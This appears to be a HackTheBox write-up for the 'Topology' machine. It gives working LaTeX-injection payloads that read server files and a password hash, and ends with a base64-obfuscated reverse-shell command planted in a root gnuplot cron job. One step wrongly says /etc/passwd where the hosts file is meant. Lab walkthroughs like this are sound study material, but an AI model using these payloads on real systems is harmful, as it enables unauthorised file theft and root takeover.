Topology — HackTheBox
Topology is a Linux machine hosting a website with a PNG image generator based on LaTeX inline math mode commands. This feature can be exploited to read arbitrary files on the server, resulting in the exposure of a password hash for a user that can then be cracked and used to SSH into the box. Once on the machine, monitoring system processes can lead to the discovery of a cronjob that executes any .plt scripts within a specific directory using gnuplot. This automated task can be leveraged to obtain a root shell by writing a malicious script within the specified directory.
NMAP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
| 256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_ 256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
Service Info: Host: topology.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernelPort 80 (HTTP)
Add topology.htb in the /etc/passwd file and navigate to the website. There’s a URL in the software projects that redirects to latex.topology.htb subdomain.
Also, while subdomain enumeration, we find two more subdomains.
ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://topology.htb/ -H "Host: FUZZ.topology.htb" -fs 6767
Add all the found subdomains in the /etc/hosts file.
dev.topology.htb
The dev subdomain looks interesting. Navigating to the website, it asks for password. Trying some common credentials doesn’t work.
stats.topology.htb
Navigating to the website, it shows following page which display two graphs.
These graphs are just static images and are loaded from files directory which has listing enabled and there’s nothing more.
latex.topology.htb
Navigating to the website, it also has directory listing enabled.
The equation.php takes latex and creates image from it.
LaTeX Injection
We can try latex injection. Following resource provides guide from latex injection/
When trying /input{/etc/passwd} , it seems that some filter is in place and it blocks the command.
However, the following payload is not blocked but it gives error.
\lstinputlisting{/etc/passwd}
Upon researching, it is found that we need to use inline math mode latex as also mentioned on the equation page. This can be done by using the $ symbol around the code. So, using the following payload, we get the content of /etc/passwd file.
$\lstinputlisting{/etc/passwd}$
There’s a user vdaisley , but we can’t read it’s SSH key. So, i started looking for apache config files. Looking at the following files which contains the virtual host configurations, we can see the applications path.
$\lstinputlisting{/etc/apache2/sites-available/000-default.conf}$Since, the dev subdomain uses the basic authentication, the credentials for it are stored in the .htpasswd file. We can try to read this file. The following screenshot from virtual host config file shows the path of dev website.
So, using the following payload, we read the .htpasswd file and get the hashed password.
$\lstinputlisting{/var/www/dev/.htpasswd}$
Using john, we can easily crack it and get the password.
Using the password, we can login via SSH as vdaisley user.
Privilege Escalation
Running pspy, we can see that a cron is running as root. It is running gnuplot which is a program for generating graphs from given scripts.
Looking at the gnuplot directory in /opt, we have write access to it
The find command in cron is finding the files with .plt extension and executing the command gnuplot <filename>.plt . Doing search, it seems that we can execute shell commands in the gnuplot. The following stackoverflow question explains the ways to do so.
So, i wrote the following gnuplot file which gives us reverse shell as root.
system("/bin/bash -c 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDQvNDQzIDA+JjE= | base64 -d | bash'")
